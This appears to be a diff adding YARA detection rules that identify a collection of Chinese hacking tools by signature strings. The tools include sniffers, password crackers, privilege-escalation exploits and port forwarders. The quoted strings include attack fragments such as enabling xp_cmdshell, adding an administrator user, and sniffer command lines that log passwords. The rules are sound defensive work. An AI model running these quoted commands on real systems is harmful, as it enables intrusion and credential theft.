+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "IdtTool.sys" fullword ascii
+      $s4 = "Idt Tool bY tMd[CsP]" fullword wide
+      $s6 = "\\\\.\\slIdtTool" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 25KB and all of them
+}
+
+rule GoodToolset_ms11046_RID2DBF : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file ms11046.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:45:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] Token system command" fullword ascii
+      $s2 = "[*] command add user 90sec 90sec" fullword ascii
+      $s3 = "[*] Add to Administrators success" fullword ascii
+      $s4 = "[*] User has been successfully added" fullword ascii
+      $s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 840KB and 2 of them
+}
+
+rule Sniffer_analyzer_SSClone_1210_full_version_RID3733 : CHINA DEMO EXE FILE HKTL T1040 {
+   meta:
+      description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 17:28:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1040"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
+      $s1 = "GetConnectString" fullword ascii
+      $s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
+      $s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3580KB and all of them
+}
+
+rule MarathonTool_2_RID2C7A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file MarathonTool.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:50:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
+      $s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
+      $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule scanms_scanms_RID2C7A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file scanms.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:50:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
+      $s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
+      $s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii
+      $s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
+      $s5 = "Internet Explorer 1.0" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 3 of them
+}
+
+rule CN_Tools_PcShare_RID2D17 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file PcShare.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:17:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
+      $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
+      $s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
+      $s5 = "port=%s;name=%s;pass=%s;" fullword wide
+      $s16 = "%s\\ini\\*.dat" fullword wide
+      $s17 = "pcinit.exe" fullword wide
+      $s18 = "http://www.pcshare.cn" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and 3 of them
+}
+
+rule pw_inspector_RID2C2E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file pw-inspector.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:38:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
+      $s2 = "http://www.thc.org" fullword ascii
+      $s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 460KB and all of them
+}
+
+rule Dos_iis7_RID2A12 : CHINA DEMO EXE FILE HKTL T1033 {
+   meta:
+      description = "Chinese Hacktool Set - file iis7.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 03:21:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1033"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\\\localhost" fullword ascii
+      $s1 = "iis.run" fullword ascii
+      $s3 = ">Could not connecto %s" fullword ascii
+      $s5 = "WHOAMI" ascii
+      $s13 = "WinSta0\\Default" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 140KB and all of them
+}
+
+rule SQLCracker_RID2ABC : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file SQLCracker_RID2ABC.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:05:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "msvbvm60.dll" fullword ascii
+      $s1 = "_CIcos" fullword ascii
+      $s2 = "kernel32.dll" fullword ascii
+      $s3 = "cKmhV" fullword ascii
+      $s4 = "080404B0" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 125KB and all of them
+}
+
+rule Dos_look_RID2A4B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file look.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 04:56:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
+      $s2 = "version=\"9.9.9.9\"" fullword ascii
+      $s3 = "name=\"CH.Ken.Tool\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them
+}
+
+rule NtGodMode_RID2A72 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file NtGodMode_RID2A72.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:01:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "to HOST!" fullword ascii
+      $s1 = "SS.EXE" fullword ascii
+      $s5 = "lstrlen0" fullword ascii
+      $s6 = "Virtual" fullword ascii
+      $s19 = "RtlUnw" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 45KB and all of them
+}
+
+rule WebCrack4_RouterPasswordCracking_RID339C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 14:55:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii
+      $s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii
+      $s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii
+      $s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii
+      $s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+}
+
+rule S_MultiFunction_Scanners_s_RID3182 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file s.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:25:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
+      $s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
+      $s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
+      $s3 = "explorer.exe http://www.hackdos.com" fullword ascii
+      $s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
+      $s5 = "Failed to read file or invalid data in file!" fullword ascii
+      $s6 = "www.hackdos.com" fullword ascii
+      $s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+      $s11 = "The interface of kernel library is invalid!" fullword ascii
+      $s12 = "eventvwr" fullword ascii
+      $s13 = "Failed to decompress data!" fullword ascii
+      $s14 = "NOTEPAD.EXE result.txt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and 4 of them
+}
+
+rule HKTL_CN_Dos_GetPass_RID2DCF : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file GetPass.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:47:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "GetLogonS" ascii
+      $s3 = "/showthread.php?t=156643" ascii
+      $s8 = "To Run As Administ" ascii
+      $s18 = "EnableDebugPrivileg" fullword ascii
+      $s19 = "sedebugnameValue" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 890KB and all of them
+}
+
+rule HKTL_CN_update_PcMain_RID2EAD : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file PcMain.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 11:24:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
+      $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+      $s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
+      $s3 = "\\svchost.exe -k " ascii
+      $s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
+      $s9 = "Global\\%s-key-event" fullword ascii
+      $s10 = "%d%d.exe" fullword ascii
+      $s14 = "%d.exe" fullword ascii
+      $s15 = "Global\\%s-key-metux" fullword ascii
+      $s18 = "GET / HTTP/1.1" fullword ascii
+      $s19 = "\\Services\\" ascii
+      $s20 = "qy001id=%d;qy001guid=%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+}
+
+rule HKTL_CN_Dos_sys_RID2C77 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file sys.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:50:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "'SeDebugPrivilegeOpen " fullword ascii
+      $s6 = "Author: Cyg07*2" fullword ascii
+      $s12 = "from golds7n[LAG]'J" fullword ascii
+      $s14 = "DAMAGE" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 150KB and all of them
+}
+
+rule HKTL_CN_Project1_RID2C9B : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Project1.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
+      $s2 = "Password.txt" fullword ascii
+      $s3 = "LoginPrompt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+}
+
+rule CN_Tools_MyUPnP_RID2C9A : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file MyUPnP.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:56:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<description>BYTELINKER.COM</description>" fullword ascii
+      $s2 = "myupnp.exe" fullword ascii
+      $s3 = "LOADER ERROR" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1500KB and all of them
+}
+
+rule CN_Tools_Shiell_RID2CD2 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file Shiell.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:05:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
+      $s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
+      $s3 = "Shift shell.exe" fullword wide
+      $s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1500KB and 2 of them
+}
+
+rule IsDebug_V1_4_RID2B2D : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file IsDebug V1.4.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 08:55:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "IsDebug.dll" fullword ascii
+      $s1 = "SV Dumper V1.0" fullword wide
+      $s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii
+      $s8 = "Error WriteMemory failed" fullword ascii
+      $s9 = "IsDebugPresent" fullword ascii
+      $s10 = "idb_Autoload" fullword ascii
+      $s11 = "Bin Files" fullword ascii
+      $s12 = "MASM32 version" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them
+}
+
+rule HScan_v1_20_PipeCmd_and_xCmd_RID3123 : CHINA DEMO EXE FILE HKTL T1035 T1077 {
+   meta:
+      description = "Chinese Hacktool Set - file PipeCmd.exe / xCmd.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 13:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1035, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
+      $s2 = "PipeCmd.exe" fullword wide
+      $s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
+      $s4 = "%s\\pipe\\%s%s%d" fullword ascii
+      $s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+      $s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
+      $s7 = "This is a service executable! Couldn't start directly." fullword ascii
+      $s8 = "Connecting to Remote Server ...Failed" fullword ascii
+      $s9 = "PIPECMDSRV" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
+}
+
+rule Dos_fp_RID296C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file fp.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 22:45:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
+      $s2 = "FPipe.exe" fullword wide
+      $s3 = "http://www.foundstone.com" fullword ascii
+      $s4 = "%s %s port %d. Address is already in use" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 65KB and all of them
+}
+
+rule CN_Tools_xsniff_RID2CFF : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file xsniff.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 10:13:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+      $s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+      $s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+      $s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+      $s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+}
+
+rule MSSqlPass_RID2A78 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file MSSqlPass_RID2A78.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:11:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide
+      $s1 = "empv.exe" fullword wide
+      $s2 = "Enterprise Manager PassView" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 120KB and all of them
+}
+
+rule WSockExpert_RID2B70 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file WSockExpert_RID2B70.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:06:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "OpenProcessCmdExecute!" fullword ascii
+      $s2 = "http://www.hackp.com" fullword ascii
+      $s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
+      $s4 = "SaveSelectedFilterCmdExecute" fullword ascii
+      $s5 = "PasswordChar@" fullword ascii
+      $s6 = "WSockHook.DLL" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+}
+
+rule Ms_Viru_racle_RID2C3C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file racle.dll"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:40:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PsInitialSystemProcess @%p" fullword ascii
+      $s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
+      $s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
+      $s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 210KB and all of them
+}
+
+rule lamescan3_RID2A88 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file lamescan3_RID2A88.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 06:38:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dic\\loginlist.txt" fullword ascii
+      $s2 = "Radmin.exe" fullword ascii
+      $s3 = "lamescan3_RID2A88.pdf!" fullword ascii
+      $s4 = "dic\\passlist.txt" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3740KB and all of them
+}
+
+rule epathobj_exp32_RID2C6F : CHINA DEMO EXE FILE HKTL T1068 {
+   meta:
+      description = "Chinese Hacktool Set - file epathobj_exp32_RID2C6F.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:49:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
+      $s1 = "Exploit ok run command" fullword ascii
+      $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii
+      $s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+      $s4 = "Mutex object did not timeout, list not patched" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 270KB and all of them
+}
+
+rule Tools_unknown_RID2C91 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file unknown.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:54:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
+      $s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
+      $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+      $s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
+      $s5 = "Host: 127.0.0.1" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+}
+
+rule IISPutScanner_RID2BF9 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file IISPutScanner_RID2BF9.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 09:29:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "KERNEL32.DLL" fullword ascii
+      $s3 = "ADVAPI32.DLL" fullword ascii
+      $s4 = "VERSION.DLL" fullword ascii
+      $s5 = "WSOCK32.DLL" fullword ascii
+      $s6 = "COMCTL32.DLL" fullword ascii
+      $s7 = "GDI32.DLL" fullword ascii
+      $s8 = "SHELL32.DLL" fullword ascii
+      $s9 = "USER32.DLL" fullword ascii
+      $s10 = "OLEAUT32.DLL" fullword ascii
+      $s11 = "LoadLibraryA" fullword ascii
+      $s12 = "GetProcAddress" fullword ascii
+      $s13 = "VirtualProtect" fullword ascii
+      $s14 = "VirtualAlloc" fullword ascii
+      $s15 = "VirtualFree" fullword ascii
+      $s16 = "ExitProcess" fullword ascii
+      $s17 = "RegCloseKey" fullword ascii
+      $s18 = "GetFileVersionInfoA" fullword ascii
+      $s19 = "ImageList_Add" fullword ascii
+      $s20 = "BitBlt" fullword ascii
+      $s21 = "ShellExecuteA" fullword ascii
+      $s22 = "ActivateKeyboardLayout" fullword ascii
+      $s23 = "BBABORT" fullword wide
+      $s25 = "BBCANCEL" fullword wide
+      $s26 = "BBCLOSE" fullword wide
+      $s27 = "BBHELP" fullword wide
+      $s28 = "BBIGNORE" fullword wide
+      $s29 = "PREVIEWGLYPH" fullword wide
+      $s30 = "DLGTEMPLATE" fullword wide
+      $s31 = "TABOUTBOX" fullword wide
+      $s32 = "TFORM1" fullword wide
+      $s33 = "MAINICON" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
+}
+
+rule hkmjjiis6_RID2AA0 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file hkmjjiis6_RID2AA0.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 07:18:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "comspec" fullword ascii
+      $s2 = "user32.dlly" ascii
+      $s3 = "runtime error" ascii
+      $s4 = "WinSta0\\Defau" ascii
+      $s5 = "AppIDFlags" fullword ascii
+      $s6 = "GetLag" fullword ascii
+      $s7 = "* FROM IIsWebInfo" ascii
+      $s8 = "wmiprvse.exe" ascii
+      $s9 = "LookupAcc" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 70KB and all of them
+}
+
+rule Dos_lcx_RID29DD : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Chinese Hacktool Set - file lcx.exe"
+      author = "Florian Roth"
+      reference = "http://tools.zjqhr.com/"
+      date = "2015-06-13 01:53:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "c:\\Users\\careful_snow\\" ascii
+      $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
+      $s3 = "[SERVER]connection to %s:%d error" fullword ascii
+      $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
